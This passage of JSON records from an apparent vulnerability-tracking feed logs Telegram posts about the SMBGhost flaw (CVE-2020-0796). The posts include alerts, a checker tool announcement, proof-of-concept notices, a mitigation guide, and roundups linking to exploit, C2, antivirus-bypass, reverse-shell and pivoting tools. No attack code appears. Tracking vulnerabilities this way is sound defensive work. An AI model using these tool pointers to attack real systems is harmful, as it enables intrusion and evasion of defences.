\u0639\u0644\u0649 \u0623\u0646\u0638\u0645\u0629 \u0648\u064a\u0646\u062f\u0648\u0632 \u0645\u0639\u064a\u0646\u0629 \u0632\u064a \u0648\u064a\u0646\u062f\u0648\u0632 10 \u0648\u064a\u0646\u062f\u0648\u0632 \u0633\u064a\u0631\u0641\u0631 2016 \u0648\u0648\u064a\u0646\u062f\u0648\u0632 \u0633\u064a\u0631\u0641\u0631 2019\n\n\u062e\u0637\u0648\u0631\u0629 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u064a\u062c\u064a \u0645\u0646 \u0625\u0646\u0647\u0627 \u0628\u062a\u0633\u0645\u062d \u0644\u0623\u064a \u0647\u0627\u0643\u0631 \u0628\u0623\u0646\u0647 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a \u0627\u0644\u062c\u0647\u0627\u0632 \u0628\u0634\u0643\u0644 \u0643\u0627\u0645\u0644 \u0648\u062f\u064a \u0645\u0634\u0643\u0644\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u064b\u0627 \u062e\u0635\u0648\u0635\u0627 \u0644\u0648 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u062f\u064a \u0645\u0648\u062c\u0648\u062f\u0629 \u0641\u064a \u0634\u0628\u0643\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u0632\u064a \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0623\u0648 \u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a \u0627\u0644\u062d\u0643\u0648\u0645\u064a\u0629 \u0644\u0623\u0646 \u062f\u0647 \u0645\u0645\u0643\u0646 \u064a\u0624\u062f\u064a \u0644\u062a\u0633\u0631\u064a\u0628 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0623\u0648 \u062a\u062f\u0645\u064a\u0631 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u0634\u0643\u0644 \u0643\u0627\u0645\u0644 \u0648\u062f\u064a \u062d\u0627\u062c\u0629 \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u0627\n\n\u0644\u0630\u0644\u0643 \u0644\u0648 \u0623\u064a \u0647\u0627\u0643\u0631 \u0639\u0627\u064a\u0632 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0644\u0627\u0632\u0645 \u064a\u0643\u0648\u0646 \u0639\u0646\u062f\u0647 \u0641\u0647\u0645 \u0639\u0645\u064a\u0642 \u062c\u062f\u0627 \u0639\u0646 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMB3 \u0648\u0639\u0646 \u0646\u0638\u0627\u0645 \u0648\u064a\u0646\u062f\u0648\u0632 \u0648\u0643\u0645\u0627\u0646 \u064a\u0643\u0648\u0646 \u0639\u0646\u062f\u0647 \u0627\u0644\u0645\u0647\u0627\u0631\u0627\u062a \u0627\u0644\u0643\u0627\u0641\u064a\u0629 \u0644\u062a\u062e\u0637\u064a \u0627\u0644\u062d\u0645\u0627\u064a\u0627\u062a \u0627\u0644\u0644\u064a \u0645\u0627\u064a\u0643\u0631\u0648\u0633\u0648\u0641\u062a \u062d\u0637\u062a\u0647\u0627 \u0641\u064a \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u0627\u0644\u0644\u064a \u0628\u0646\u0635\u062d \u0628\u064a\u0647 \u0623\u064a \u062d\u062f \u0628\u064a\u0634\u062a\u063a\u0644 \u0641\u064a \u0627\u0644\u0645\u062c\u0627\u0644 \u062f\u0647 \u0625\u0646\u0647 \u062f\u0627\u064a\u0645\u0627 \u064a\u0637\u0644\u0639 \u0639\u0644\u0649 \u0643\u0644 \u062c\u062f\u064a\u062f \u0648\u064a\u062d\u0627\u0648\u0644 \u064a\u0641\u0647\u0645 \u062a\u0641\u0627\u0635\u064a\u0644 \u0623\u0643\u062a\u0631 \u0639\u0646 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644\u0627\u062a \u0648\u0627\u0644\u0646\u0638\u0645 \u0627\u0644\u0644\u064a \u0628\u064a\u0634\u062a\u063a\u0644 \u0639\u0644\u064a\u0647\u0627 \u0639\u0634\u0627\u0646 \u064a\u0642\u062f\u0631 \u064a\u0643\u062a\u0628 Exploits \u0646\u0627\u062c\u062d\u0629 \u0648\u0645\u0624\u062b\u0631\u0629\n\n\u0631\u0627\u0628\u0637 \u0627\u0644\u0640EXPLOIT", "creation_timestamp": "2024-07-12T07:52:20.000000Z"}, {"uuid": "5c937e58-16fd-44b1-88bc-5b68e612ce4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "Telegram/ax7vss3k4Fudn4O23Fyb93CBJGJfyLErOwidHMCmbM6p89Wn", "content": "", "creation_timestamp": "2025-02-06T02:41:37.000000Z"}, {"uuid": "86366e29-2934-4d04-bd7b-6637b6f577c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/pt_soft/243", "content": "\ud83d\uddbc\ufe0f Moriarty v1.1\n\n\u0427\u0435\u043a\u0435\u0440 CVEs \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 C# \u0434\u043b\u044f \u041e\u0421 \ud83c\udfe0 Windows\n\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nWindows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)\nWindows 11 (Versions: 21H2, 22H1, 22H2, 23H1)\nWindows Server 2016, 2019, 2022\n\n\u0421\u043f\u0438\u0441\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (35):\nMS10-015\nMS10-092\nMS13-053\nMS13-081\nMS14-058\nMS15-051\nMS15-078\nMS16-016\nMS16-032\nMS16-034\nMS16-135\nCVE-2017-7199\nCVE-2019-0836\nCVE-2019-0836\nCVE-2019-1064\nCVE-2019-1130\nCVE-2019-1253\nCVE-2019-1315\nCVE-2019-1385\nCVE-2019-1388\nCVE-2019-1405\nCVE-2020-0668\nCVE-2020-0683\nCVE-2020-0796\nCVE-2020-1013\nCVE-2020-1013\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nCVE-2021-44228\nCVE-2021-36934\nCVE-2022-40140\nCVE-2022-22965\nCVE-2023-36664\n\n\ud83d\udc49 \u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\n\n\u0422\u0430\u043a\u0436\u0435 \u0431\u043e\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u043f\u043e CVE\n\n!poc CVE-2019-1064\n\n\ud83d\udcbb Home\n\n\u0414\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f Visual Studio \u0438 .NET Framework 4.8 Developer Pack\n\n#moriarty #checker #csharp\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-03-15T08:58:02.000000Z"}, {"uuid": "e0e946d0-f1e9-49d6-bb9c-5ffaa12b6141", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/arpsyndicate/187", "content": "#ExploitObserverAlert\n\nCVE-2020-0796\n\nDESCRIPTION: Exploit Observer has 357 entries related to CVE-2020-0796. A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.\n\nFIRST-EPSS: 0.974840000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-11-17T03:20:23.000000Z"}, {"uuid": "3af01c38-b3c9-41a0-bf32-16f2fb7f73d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/arpsyndicate/1180", "content": "#ExploitObserverAlert\n\nCVE-2020-0796\n\nDESCRIPTION: Exploit Observer has 376 entries related to CVE-2020-0796. A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.\n\nFIRST-EPSS: 0.974840000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-04T10:30:11.000000Z"}, {"uuid": "c9d38511-58a3-4d40-9f7c-e93f9944e733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/netrunnerz/369", "content": "CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0441\u043f\u043e\u0441\u043e\u0431\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c Microsoft SMB 3.1.1. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043d\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 SMBv3-\u0441\u0435\u0440\u0432\u0435\u0440. \u0427\u0442\u043e\u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0435, \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 SMBv3-\u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0443\u0431\u0435\u0434\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u043d\u0435\u043c\u0443.\n\n#CVE #POC", "creation_timestamp": "2022-12-17T11:53:07.000000Z"}, {"uuid": "b07d59c6-93d6-45da-9d8e-0dc53b6259ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/arpsyndicate/1782", "content": "#ExploitObserverAlert\n\nCVE-2020-0796\n\nDESCRIPTION: Exploit Observer has 376 entries related to CVE-2020-0796. A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.\n\nFIRST-EPSS: 0.974840000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-12T01:05:41.000000Z"}, {"uuid": "9ea940a3-5cd2-4343-96d6-1e444cbd4f02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/arpsyndicate/157", "content": "#ExploitObserverAlert\n\nCVE-2020-0796\n\nDESCRIPTION: Exploit Observer has 357 entries related to CVE-2020-0796. A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.\n\nFIRST-EPSS: 0.974840000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-11-13T19:06:56.000000Z"}, {"uuid": "5804c8cc-b6a8-480f-b541-9c62e2b87612", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/arpsyndicate/753", "content": "#ExploitObserverAlert\n\nCVE-2020-0796\n\nDESCRIPTION: Exploit Observer has 374 entries related to CVE-2020-0796. A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.\n\nFIRST-EPSS: 0.974840000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-11-29T14:33:01.000000Z"}, {"uuid": "cd247401-96df-4de3-85f6-0a23588748b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "Telegram/pHQFnbMvCS4mBi_52yyeHAIHYFk9gFz4_M5wCYmj8kARmA", "content": "", "creation_timestamp": "2022-07-24T09:35:20.000000Z"}, {"uuid": "f71cbede-6502-4c0c-9abc-8f4934e6eafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2189", "content": "#Tool \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConfuser\n\nA tool to detect Dependency Confusion vulnerabilities. It allows scanning packages.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.\n\nhttps://github.com/doyensec/confuser\n\nDependency Confusion:\nhttps://blog.doyensec.com//2022/07/21/dependency-confusion.html\n\n\u200b\u200bNinjaDroid\n\nSimple tool to reverse engineering #Android APK packages.\n\nhttps://github.com/rovellipaolo/NinjaDroid\n\n\u200b\u200bSMBaloo\n\nA CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows ARM64.\n\nhttps://github.com/msuiche/smbaloo\n\n#cve\n\n\u200b\u200bMerlin\n\nPost-exploit Command & Control (C2) tool, also known as a Remote Access Tool (RAT), that communicates using the HTTP/1.1, HTTP/2, and HTTP/3 protocols. HTTP/3 is the combination of HTTP/2 over the Quick UDP Internet Connections (QUIC) protocol. \n\nThis tool was the result of my work evaluating HTTP/2 in a paper titled Practical Approach to Detecting and Preventing Web Application Attacks over HTTP/2. Merlin is also my first attempts at learning Golang.\n\nhttps://github.com/MythicAgents/merlin\n\nDocs:\nhttps://merlin-c2.readthedocs.io/en/latest/index.html\n\n#redteam\n\n\u200b\u200bysoserial.net\n\nA proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization.\n\nhttps://github.com/pwntester/ysoserial.net\n\n\u200b\u200bMsfMania\n\nCommand line tool developed in Python that is designed to bypass antivirus software on Windows and Linux/Mac in the future.\n\nhttps://github.com/G1ft3dC0d3/MsfMania\n\n\u200b\u200bInvoke-Obfuscation\n\nPowerShell v2.0+ compatible PowerShell command and script obfuscator.\n\nhttps://github.com/danielbohannon/Invoke-Obfuscation\n\nCode #obfuscation through Mixed Boolean-Arithmetic expressions.\n\nhttps://github.com/arnaugamez/talks/tree/master/2021/00_intent\n\n\u200b\u200bHook\n\nHook exploits a parameter injection vulnerability in the WatchGuard SSH interface. The vulnerability allows a low privileged user to exfiltrate arbitrary system files to an attacker controlled FTP server. \n\nFortunately, there is a builtin low privileged user named status that this script defaults to. It isn't unreasonable to assume that the status user will use a password of readonly, but it isn't required.\n\nhttps://github.com/jbaines-r7/hook\n\nOffensive-Carbon\n\nWeaponizing Carbon Lang for #RedTeam operation\n\nhttps://github.com/ArchonLabs/Offensive-Carbon\n\n\u200b\u200bpivotnacci\n\nPivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents. The architecture looks like the following:\n\nThis tool was inspired by the great reGeorg. However, it includes some improvements:\n\n\u25ab\ufe0f Support for balanced servers\n\u25ab\ufe0f Customizable polling interval, useful to reduce detection rates\n\u25ab\ufe0f Auto drop connections closed by a server\n\u25ab\ufe0f Modular and cleaner code\n\u25ab\ufe0f Installation through pip\n\u25ab\ufe0f Password-protected agents\n\nhttps://github.com/blackarrowsec/pivotnacci\n\n\ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\nwww.ghostclan.org", "creation_timestamp": "2022-12-27T09:59:54.000000Z"}, {"uuid": "e0f494bd-fde6-495e-82c9-3aac2753ed1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "Telegram/-yKf1Dz2fhlRkuZLHiEFtdhHKIVovzy35IoMgcEk0nkl9Q", "content": "", "creation_timestamp": "2020-03-11T20:57:20.000000Z"}, {"uuid": "e4b31861-39a3-4970-ae1b-0b3723d96732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/259", "content": "#Tool \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConfuser\n\nA tool to detect Dependency Confusion vulnerabilities. It allows scanning packages.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.\n\nhttps://github.com/doyensec/confuser\n\nDependency Confusion:\nhttps://blog.doyensec.com//2022/07/21/dependency-confusion.html\n\n\u200b\u200bNinjaDroid\n\nSimple tool to reverse engineering #Android APK packages.\n\nhttps://github.com/rovellipaolo/NinjaDroid\n\n\u200b\u200bSMBaloo\n\nA CVE-2020-0796 (aka \"SMBGhost\") exploit for Windows ARM64.\n\nhttps://github.com/msuiche/smbaloo\n\n#cve\n\n\u200b\u200bMerlin\n\nPost-exploit Command & Control (C2) tool, also known as a Remote Access Tool (RAT), that communicates using the HTTP/1.1, HTTP/2, and HTTP/3 protocols. HTTP/3 is the combination of HTTP/2 over the Quick UDP Internet Connections (QUIC) protocol. \n\nThis tool was the result of my work evaluating HTTP/2 in a paper titled Practical Approach to Detecting and Preventing Web Application Attacks over HTTP/2. Merlin is also my first attempts at learning Golang.\n\nhttps://github.com/MythicAgents/merlin\n\nDocs:\nhttps://merlin-c2.readthedocs.io/en/latest/index.html\n\n#redteam\n\n\u200b\u200bysoserial.net\n\nA proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization.\n\nhttps://github.com/pwntester/ysoserial.net\n\n\u200b\u200bMsfMania\n\nCommand line tool developed in Python that is designed to bypass antivirus software on Windows and Linux/Mac in the future.\n\nhttps://github.com/G1ft3dC0d3/MsfMania\n\n\u200b\u200bInvoke-Obfuscation\n\nPowerShell v2.0+ compatible PowerShell command and script obfuscator.\n\nhttps://github.com/danielbohannon/Invoke-Obfuscation\n\nCode #obfuscation through Mixed Boolean-Arithmetic expressions.\n\nhttps://github.com/arnaugamez/talks/tree/master/2021/00_intent\n\n\u200b\u200bHook\n\nHook exploits a parameter injection vulnerability in the WatchGuard SSH interface. The vulnerability allows a low privileged user to exfiltrate arbitrary system files to an attacker controlled FTP server. \n\nFortunately, there is a builtin low privileged user named status that this script defaults to. It isn't unreasonable to assume that the status user will use a password of readonly, but it isn't required.\n\nhttps://github.com/jbaines-r7/hook\n\nOffensive-Carbon\n\nWeaponizing Carbon Lang for #RedTeam operation\n\nhttps://github.com/ArchonLabs/Offensive-Carbon\n\n\u200b\u200bpivotnacci\n\nPivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents. The architecture looks like the following:\n\nThis tool was inspired by the great reGeorg. However, it includes some improvements:\n\n\u25ab\ufe0f Support for balanced servers\n\u25ab\ufe0f Customizable polling interval, useful to reduce detection rates\n\u25ab\ufe0f Auto drop connections closed by a server\n\u25ab\ufe0f Modular and cleaner code\n\u25ab\ufe0f Installation through pip\n\u25ab\ufe0f Password-protected agents\n\nhttps://github.com/blackarrowsec/pivotnacci\n\n\ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\nwww.ghostclan.org", "creation_timestamp": "2022-12-27T09:59:54.000000Z"}, {"uuid": "b3d113c8-8c3b-47a4-8005-305a27d87378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "Telegram/8v2C0HPDKxCthCigBf6WGQMYLcxbm8CzE8VEj9vEGCbIDTI", "content": "", "creation_timestamp": "2025-04-20T23:00:05.000000Z"}, {"uuid": "8b267822-e046-46ac-aa6a-9b96253953aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "Telegram/7P6uGWxCDBAyBwPefDkaZ3RRva7RRh8YPkE0EO9VJ3hASmA", "content": "", "creation_timestamp": "2024-08-24T19:27:26.000000Z"}, {"uuid": "415cc31b-c28c-4d3b-9ab4-fa68e849d0d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/ZerodayExploitware/1328", "content": "\u27a1\ufe0fSMB GHOST GUIDE\u27a1\ufe0f\n\nSMB Ghost (CVE-2020-0796) is a critical vulnerability found in the Microsoft Server Message Block (SMB) protocol, which is primarily used for file and printer sharing in Windows environments. \n\n\ud83d\udc8eAttack Procedure:\n\n\ud83d\udda5Exploiting the Vulnerability: The attacker sends a specially crafted packet to the target system's SMBv3 server, exploiting the SMB Ghost vulnerability.\n\n\ud83d\udda5Remote Code Execution: By successfully exploiting the vulnerability, the attacker gains the ability to execute arbitrary code on the target system, essentially taking control of it.\n\n\ud83d\udda5Spreading Malware: Once the attacker gains control, they can deploy various malicious payloads.\n\n\ud83d\udca1Prevention Methods:\n\n\ud83d\udda5Patching and Updating: It is crucial to keep your systems and software up to date with the latest security patches. Microsoft promptly released a patch to address the SMB Ghost vulnerability. Ensure that all affected systems are patched to the latest version.\n\n\ud83d\udda5Network Segmentation: Implementing network segmentation can help contain the impact of potential attacks. By isolating critical systems from less secure ones, you reduce the attack surface and limit an attacker's ability to move laterally across your network.\n\n\ud83d\udda5Firewall Configuration: Configure firewalls to restrict access to SMB ports (such as TCP 445 and UDP 445) from external networks. Limiting SMB traffic to only necessary and trusted sources helps prevent unauthorized access.\n\n\ud83d\udda5Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): Utilize IDS or IPS solutions to detect and block any attempt to exploit the SMB Ghost vulnerability. \n\n\ud83d\udda5User Awareness and Training: Educate users about phishing attacks and social engineering techniques.\n\n\ud83d\udda5Disable SMBv3 Compression: If not strictly necessary, consider disabling SMBv3 compression to mitigate the risk of SMB Ghost attacks. Disabling this feature can prevent potential exploitation.\n\n\u2618Pass: @its_me_kali \n\n\u2661 \u3164\u00a0\u00a0\u00a0 \u274d\u3164\u00a0\u00a0\u00a0 \u2399\u3164\u00a0 \u2332\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \n\u02e1\u1da6\u1d4f\u1d49\u00a0 \u1d9c\u1d52\u1d50\u1d50\u1d49\u207f\u1d57\u00a0 \u02e2\u1d43\u1d5b\u1d49\u00a0 \u02e2\u02b0\u1d43\u02b3\u1d49", "creation_timestamp": "2023-06-14T11:11:15.000000Z"}, {"uuid": "5d3dad05-7251-4b5a-aaa2-7d3664acc474", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3071", "content": "Tools - Hackers Factory \n\nRuy-Lopez\n\nThis repository contains the Proof-of-Concept(PoC) for a new approach to completely prevent DLLs from being loaded into a newly spawned process. The initial use-case idea was to block AV/EDR vendor DLLs from being loaded, so that userland hooking based detections are bypassed.\n\nhttps://github.com/S3cur3Th1sSh1t/Ruy-Lopez\n\n#infosec #pentesting #redteam\n\nCymulate Framework\n\nA framework to help #redteam construct fully customizable and automated APT attacks easily.\n\nhttps://github.com/opabravo/cymulate-framework\n\n#cybersecurity #infosec #pentesting\n\nAttacking WPA3\n\nNew Vulnerabilities & Exploit Framework!\n\nhttps://github.com/domienschepers/wifi-framework\n\nDetails:\nhttps://conference.hitb.org/hitbsecconf2022sin/session/attacking-wpa3-new-vulnerabilities-and-exploit-framework/\n\n#cybersecurity #infosec #pentesting\n\nSshimpanzee\n\nA reverse shell based on sshd supporting DNS and ICMP Tunnelling as well as HTTP and Socks Proxies.\n\nhttps://github.com/lexfo/sshimpanzee\n\n#infosec #pentesting #redteam\n\nMihari\n\nA tool for #OSINT based threat hunting.\n\nhttps://github.com/ninoseki/mihari\n\nCVE-2023-33246\n\nApache rocketmq remote code execution vulnerability.\n\nhttps://github.com/I5N0rth/CVE-2023-33246\n\n#cve #cybersecurity #infosec\n\nRISC-V: Emoji Shellcoding\n\nThis tool \u2692 helps design RISC-V (both 32-bit and 64-bit) shellcodes capable of running arbitrary code, whose ASCII binary representation use only Unicode UTF-8 emojis \ud83e\udd2f.\n\nhttps://github.com/RischardV/emoji-shellcoding\n\n#cybersecurity #infosec #redteam\n\nCQ\n\nCode Query, a universal code security scanning tool.\n\nhttps://github.com/nccgroup/cq\n\n#cybersecurity #infosec\n\nCVE-2020-0796\n\nWindows Protocol TestSuites is to trigger BSoD (full #exploit).\n\nhttps://github.com/Ajomix/CVE-2020-0796\n\n#cve #cybersecurity #infosec\n\nRed Teaming & Pentesting checklists for various engagements\n\nEven though, a penetration test is a creative process most people maintain private checklists to ensure that they will not forget to test 